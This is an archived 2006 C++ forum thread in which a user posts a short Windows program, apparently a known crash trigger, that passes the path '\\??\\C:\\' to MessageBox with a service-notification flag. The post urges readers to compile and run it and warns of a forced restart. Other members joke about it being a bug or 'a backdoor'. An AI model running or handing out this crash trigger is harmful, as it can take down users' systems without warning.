View Full Version: will someone explain?

C++ Learning Community > C++ in General > will someone explain?


Title: will someone explain?


icon0x - December 23, 2006 06:39 AM (GMT)
Warning : You're computer might crash and need a restart!

CODE


#include <iostream>
#include <windows.h>

using namespace std;

int main(int argc, char **argv)
{

   char fun [] = "\\??\\C:\\";
   for(int i = 0; i < 10; i ++)
   {
         ::MessageBox(0, fun, fun, MB_SERVICE_NOTIFICATION);
   }

   system("PAUSE");
   return EXIT_SUCCESS;
}



Compile an run

EDIT: Added a warning.

C-Man - December 23, 2006 08:19 AM (GMT)
So what do you think Microsoft calls this one , a bug or a feature ?

Viper - December 23, 2006 08:25 AM (GMT)
Exactly what your rank says, icon0x :)

dr voodoo - December 23, 2006 10:53 AM (GMT)
QUOTE (C-Man @ Dec 23 2006, 08:19 AM)
So what do you think Microsoft calls this one , a bug or a feature ?

A backdoor ;)




Hosted for free by InvisionFree